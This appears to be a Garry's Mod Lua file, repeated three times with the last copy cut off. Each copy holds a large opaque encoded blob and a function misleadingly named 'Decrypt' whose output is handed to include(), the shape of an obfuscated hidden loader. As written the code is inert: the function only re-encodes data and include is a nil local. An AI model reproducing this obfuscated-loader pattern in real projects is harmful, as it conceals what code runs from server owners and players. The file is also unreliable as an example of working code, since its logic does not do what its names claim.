
----------------------------------------
--         2014-07-12 20:32:24          --
------------------------------------------
local CCC = [[==AAAwRc
CxBKRAmw9j7AtuZw0Gf24ds2zsToJ6aBdM4vazqVCzrwo/gYqzaYYAAAAAAAAAAAtAQAAAQX==AYFFxB
GOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjYAAAAAAAAAAAtAQAAAQX==AYba2z
NOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADZAAAAAAAAAAAtAQAAAQX==AYF17l
VOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjZAAAAAAAAAAAtAQAAAQX==AYbKBY
dOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADaAAAAAAAAAAAtAQAAAQX==AYFlGK
lOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjaAAAAAAAAAAAtAQAAAQX==AYb6L8
sOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADbAAAAAAAAAAAtAQAAAQX==AYFVRu
0OC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjbAAAAAAAAAAAtAQAAAQX==AYbqWg
8OC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADcAAAAAAAAAAAtAQAAAQX==AYFFcS
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]]
local include
local function Decrypt(v)
	local c,a = "local CCC = [[", 0
	for i=0,#v * 60 do
		a = a * a - a
		c = c..util.Base64Encode( util.Compress( string.reverse(a..i..a..v..i) ) ) 
		a = a * a + a
	end
	return c
end
if include then include( Decrypt(CCC) ) end
CCC = nil


----------------------------------------
--         2014-07-12 20:32:24          --
------------------------------------------
local CCC = [[==AAAwRc
CxBKRAmw9j7AtuZw0Gf24ds2zsToJ6aBdM4vazqVCzrwo/gYqzaYYAAAAAAAAAAAtAQAAAQX==AYFFxB
GOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjYAAAAAAAAAAAtAQAAAQX==AYba2z
NOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADZAAAAAAAAAAAtAQAAAQX==AYF17l
VOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjZAAAAAAAAAAAtAQAAAQX==AYbKBY
dOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADaAAAAAAAAAAAtAQAAAQX==AYFlGK
lOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjaAAAAAAAAAAAtAQAAAQX==AYb6L8
sOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADbAAAAAAAAAAAtAQAAAQX==AYFVRu
0OC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjbAAAAAAAAAAAtAQAAAQX==AYbqWg
8OC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADcAAAAAAAAAAAtAQAAAQX==AYFFcS
EPC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjcAAAAAAAAAAAtAQAAAQXAke7QHT2
/YfMAfbJ+c3xPsfIJLGVNt1aCEgx/AJAcUd1fO4nkPO9HETdYzCjYAAAAAAAAAAAvAQAAAQXAAi2clXl
TvbnscGh2bdjv8ZkNnWzK2XqqL3WuRurDWGZYFBmz5ZFA+SdYzL4YAAAAAAAAAAAvAQAAAQXgCiUdoH5
V9IlIWGLxIst9DMAvop8VOemLlFO5p6Owx8IYphsLisAxccZHJIjYAAAAAAAAAAAvAQAAAQXgCE9y2H5
V9IlIWGLxIst9DMAvop8VOemLlFO5p6Owx8IYphsLisAxccZHJMjYAAAAAAAAAAAvAQAAAQXliqecsEE
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJQjYAAAAAAAAAAAvAQAAAQXlies85EE
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJUjYAAAAAAAAAAAvAQAAAQXliYjoGFE
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJYjYAAAAAAAAAAAvAQAAAQXliKyIUFE
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJcjYAAAAAAAAAAAvAQAAAQXq/MwbWgu
vYr8IElEIfI7Xz3gsE93zJTQUukuINS0+ghJX4Y65RxkMXI5GJgjYAAAAAAAAAAAvAQAAAQXq/2JKjgu
vYr8IElEIfI7Xz3gsE93zJTQUukuINS0+ghJX4Y65RxkMXI5GJkjYAAAAAAAAAAAvAQAAAQXAke7QPBD
AZfMAfbJ+c3xPsfIJLGVNt1aCEgx/AJAcUd1fO4nkPO9HETdYzCDZAAAAAAAAAAAvAQAAAQXhjdM5qQP
sAbiTFYfnGXtlg4Ue6J4ZtncdfJHcPSm6HYsXMonnOVoYfXqHJEDZAAAAAAAAAAAvAQAAAQXAAiWjnzz
TvbnscGh2bdjv8ZkNnWzK2XqqL3WuRurDWGZYFBmz5ZFA+SdYzLYZAAAAAAAAAAAvAQAAAQXgCE9qZf6
V9IlIWGLxIst9DMAvop8VOemLlFO5p6Owx8IYphsLisAxccZHJMDZAAAAAAAAAAAvAQAAAQXliqeIkZF
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJQDZAAAAAAAAAAAvAQAAAQXliesoxZF
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJUDZAAAAAAAAAAAvAQAAAQXliYjU+ZF
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJYDZAAAAAAAAAAAvAQAAAQXliKy0LaF
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJcDZAAAAAAAAAAAvAQAAAQXq/MwXryv
vYr8IElEIfI7Xz3gsE93zJTQUukuINS0+ghJX4Y65RxkMXI5GJgDZAAAAAAAAAAAvAQAAAQXq/2JG4yv
vYr8IElEIfI7Xz3gsE93zJTQUukuINS0+ghJX4Y65RxkMXI5GJkDZAAAAAAAAAAAvAQAAAQXAke7QXvP
AZfMAfbJ+c3xPsfIJLGVNt1aCEgx/AJAcUd1fO4nkPO9HETdYzCjZAAAAAAAAAAAvAQAAAQXhjdMR9qQ
sAbiTFYfnGXtlg4Ue6J4ZtncdfJHcPSm6HYsXMonnOVoYfXqHJEjZAAAAAAAAAAAvAQAAAQXgCiUNu27
V9IlIWGLxIst9DMAvop8VOemLlFO5p6Owx8IYphsLisAxccZHJIjZAAAAAAAAAAAvAQAAAQXAAi2ppPC
UvbnscGh2bdjv8ZkNnWzK2XqqL3WuRurDWGZYFBmz5ZFA+SdYzL4ZAAAAAAAAAAAvAQAAAQXliqe0buG
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJQjZAAAAAAAAAAAvAQAAAQXliesUpuG
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJUjZAAAAAAAAAAAvAQAAAQXliYjA2uG
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJYjZAAAAAAAAAAAvAQAAAQXliKygDvG
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJcjZAAAAAAAAAAAvAQAAAQXqMq+WAFx
vYr8IElEIfI7Xz3gsE93zJTQUukuINS0+ghJX4Y65RxkMXI5GJgjZAAAAAAAAAAAvAQAAAQXqMKdFNFx
vYr8IElEIfI7Xz3gsE93zJTQUukuINS0+ghJX4Y65RxkMXI5GJkjZAAAAAAAAAAAvAQAAAQXAke7Qfdc
AZfMAfbJ+c3xPsfIJLGVNt1aCEgx/AJAcUd1fO4nkPO9HETdYzCDaAAAAAAAAAAAvAQAAAQXhjdMpPFS
sAbiTFYfnGXtlg4Ue6J4ZtncdfJHcPSm6HYsXMonnOVoYfXqHJEDaAAAAAAAAAAAvAQAAAQXgCiUFRO9
V9IlIWGLxIst9DMAvop8VOemLlFO5p6Owx8IYphsLisAxccZHJIDaAAAAAAAAAAAvAQAAAQXgCE9afO9
V9IlIWGLxIst9DMAvop8VOemLlFO5p6Owx8IYphsLisAxccZHJMDaAAAAAAAAAAAvAQAAAQXAAiWwrrQ
UvbnscGh2bdjv8ZkNnWzK2XqqL3WuRurDWGZYFBmz5ZFA+SdYzLYaAAAAAAAAAAAvAQAAAQXliesAhDI
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJUDaAAAAAAAAAAAvAQAAAQXliYjstDI
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJYDaAAAAAAAAAAAvAQAAAQXliKyM7DI
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJcDaAAAAAAAAAAAvAQAAAQXq/MwTVXy
vYr8IElEIfI7Xz3gsE93zJTQUukuINS0+ghJX4Y65RxkMXI5GJgDaAAAAAAAAAAAvAQAAAQXq/2JCiXy
vYr8IElEIfI7Xz3gsE93zJTQUukuINS0+ghJX4Y65RxkMXI5GJkDaAAAAAAAAAAAvAQAAAQXAke7QnLp
AZfMAfbJ+c3xPsfIJLGVNt1aCEgx/AJAcUd1fO4nkPO9HETdYzCjaAAAAAAAAAAAvAQAAAQXhjdM9hfT
sAbiTFYfnGXtlg4Ue6J4ZtncdfJHcPSm6HYsXMonnOVoYfXqHJEjaAAAAAAAAAAAvAQAAAQXgCiU9zl+
V9IlIWGLxIst9DMAvop8VOemLlFO5p6Owx8IYphsLisAxccZHJIjaAAAAAAAAAAAvAQAAAQXgCE9SCm+
V9IlIWGLxIst9DMAvop8VOemLlFO5p6Owx8IYphsLisAxccZHJMjaAAAAAAAAAAAvAQAAAQXliqeILYJ
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJQjaAAAAAAAAAAAvAQAAAQXAAi22tHf
UvbnscGh2bdjv8ZkNnWzK2XqqL3WuRurDWGZYFBmz5ZFA+SdYzL4aAAAAAAAAAAAvAQAAAQXliYjUlYJ
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJYjaAAAAAAAAAAAvAQAAAQXliKy0yYJ
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJcjaAAAAAAAAAAAvAQAAAQXq/MwPqpz
vYr8IElEIfI7Xz3gsE93zJTQUukuINS0+ghJX4Y65RxkMXI5GJgjaAAAAAAAAAAAvAQAAAQXq/2J+2pz
vYr8IElEIfI7Xz3gsE93zJTQUukuINS0+ghJX4Y65RxkMXI5GJkjaAAAAAAAAAAAvAQAAAQXAke7Qv51
AZfMAfbJ+c3xPsfIJLGVNt1aCEgx/AJAcUd1fO4nkPO9HETdYzCDbAAAAAAAAAAAvAQAAAQXhjdMV05U
sAbiTFYfnGXtlg4Ue6J4ZtncdfJHcPSm6HYsXMonnOVoYfXqHJEDbAAAAAAAAAAAvAQAAAQXgCiU1W9/
V9IlIWGLxIst9DMAvop8VOemLlFO5p6Owx8IYphsLisAxccZHJIDbAAAAAAAAAAAvAQAAAQXgCE9Kl9/
V9IlIWGLxIst9DMAvop8VOemLlFO5p6Owx8IYphsLisAxccZHJMDbAAAAAAAAAAAvAQAAAQXliqe0CtK
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJQDbAAAAAAAAAAAvAQAAAQXliesUQtK
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJUDbAAAAAAAAAAAvAQAAAQXAAiW9vjt
UvbnscGh2bdjv8ZkNnWzK2XqqL3WuRurDWGZYFBmz5ZFA+SdYzLYbAAAAAAAAAAAvAQAAAQXliKygqtK
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJcDbAAAAAAAAAAAvAQAAAQXq/MwL/70
vYr8IElEIfI7Xz3gsE93zJTQUukuINS0+ghJX4Y65RxkMXI5GJgDbAAAAAAAAAAAvAQAAAQXq/2J6L80
vYr8IElEIfI7Xz3gsE93zJTQUukuINS0+ghJX4Y65RxkMXI5GJkDbAAAAAAAAAAAvAQAAAQXAke7Q3nC
BZfMAfbJ+c3xPsfIJLGVNt1aCEgx/AJAcUd1fO4nkPO9HETdYzCjbAAAAAAAAAAAvAQAAAQXhjdMtGUW
sAbiTFYfnGXtlg4Ue6J4ZtncdfJHcPSm6HYsXMonnOVoYfXqHJEjbAAAAAAAAAAAvAQAAAQXgCiUt5UB
W9IlIWGLxIst9DMAvop8VOemLlFO5p6Owx8IYphsLisAxccZHJIjbAAAAAAAAAAAvAQAAAQXgCE9CIVB
W9IlIWGLxIst9DMAvop8VOemLlFO5p6Owx8IYphsLisAxccZHJMjbAAAAAAAAAAAvAQAAAQXliqeg6BM
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJQjbAAAAAAAAAAAvAQAAAQXliesAICM
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJUjbAAAAAAAAAAAvAQAAAQXliYjsUCM
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJYjbAAAAAAAAAAAvAQAAAQXAAi2Dy/7
UvbnscGh2bdjv8ZkNnWzK2XqqL3WuRurDWGZYFBmz5ZFA+SdYzL4bAAAAAAAAAAAvAQAAAQXqMq+KUO2
vYr8IElEIfI7Xz3gsE93zJTQUukuINS0+ghJX4Y65RxkMXI5GJgjbAAAAAAAAAAAvAQAAAQXqMKd5gO2
vYr8IElEIfI7Xz3gsE93zJTQUukuINS0+ghJX4Y65RxkMXI5GJkjbAAAAAAAAAAAvAQAAAQXAke7Q/VP
BZfMAfbJ+c3xPsfIJLGVNt1aCEgx/AJAcUd1fO4nkPO9HETdYzCDcAAAAAAAAAAAvAQAAAQXhjdMFZuX
sAbiTFYfnGXtlg4Ue6J4ZtncdfJHcPSm6HYsXMonnOVoYfXqHJEDcAAAAAAAAAAAvAQAAAQXgCiUlcsC
W9IlIWGLxIst9DMAvop8VOemLlFO5p6Owx8IYphsLisAxccZHJIDcAAAAAAAAAAAvAQAAAQX]]
local include
local function Decrypt(v)
	local c,a = "local CCC = [[", 0
	for i=0,#v * 60 do
		a = a * a - a
		c = c..util.Base64Encode( util.Compress( string.reverse(a..i..a..v..i) ) ) 
		a = a * a + a
	end
	return c
end
if include then include( Decrypt(CCC) ) end
CCC = nil


----------------------------------------
--         2014-07-12 20:32:24          --
------------------------------------------
local CCC = [[==AAAwRc
CxBKRAmw9j7AtuZw0Gf24ds2zsToJ6aBdM4vazqVCzrwo/gYqzaYYAAAAAAAAAAAtAQAAAQX==AYFFxB
GOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjYAAAAAAAAAAAtAQAAAQX==AYba2z
NOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADZAAAAAAAAAAAtAQAAAQX==AYF17l
VOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjZAAAAAAAAAAAtAQAAAQX==AYbKBY
dOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADaAAAAAAAAAAAtAQAAAQX==AYFlGK
lOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjaAAAAAAAAAAAtAQAAAQX==AYb6L8
sOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADbAAAAAAAAAAAtAQAAAQX==AYFVRu
0OC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjbAAAAAAAAAAAtAQAAAQX==AYbqWg
8OC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADcAAAAAAAAAAAtAQAAAQX==AYFFcS
EPC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjcAAAAAAAAAAAtAQAAAQXAke7QHT2
/YfMAfbJ+c3xPsfIJLGVNt1aCEgx/AJAcUd1fO4nkPO9HETdYzCjYAAAAAAAAAAAvAQAAAQXAAi2clXl
TvbnscGh2bdjv8ZkNnWzK2XqqL3WuRurDWGZYFBmz5ZFA+SdYzL4YAAAAAAAAAAAvAQAAAQXgCiUdoH5
V9IlIWGLxIst9DMAvop8VOemLlFO5p6Owx8IYphsLisAxccZHJIjYAAAAAAAAAAAvAQAAAQXgCE9y2H5
V9IlIWGLxIst9DMAvop8VOemLlFO5p6Owx8IYphsLisAxccZHJMjYAAAAAAAAAAAvAQAAAQXliqecsEE
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJQjYAAAAAAAAAAAvAQAAAQXlies85EE
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJUjYAAAAAAAAAAAvAQAAAQXliYjoGFE
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJYjYAAAAAAAAAAAvAQAAAQXliKyIUFE
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJcjYAAAAAAAAAAAvAQAAAQXq/MwbWgu
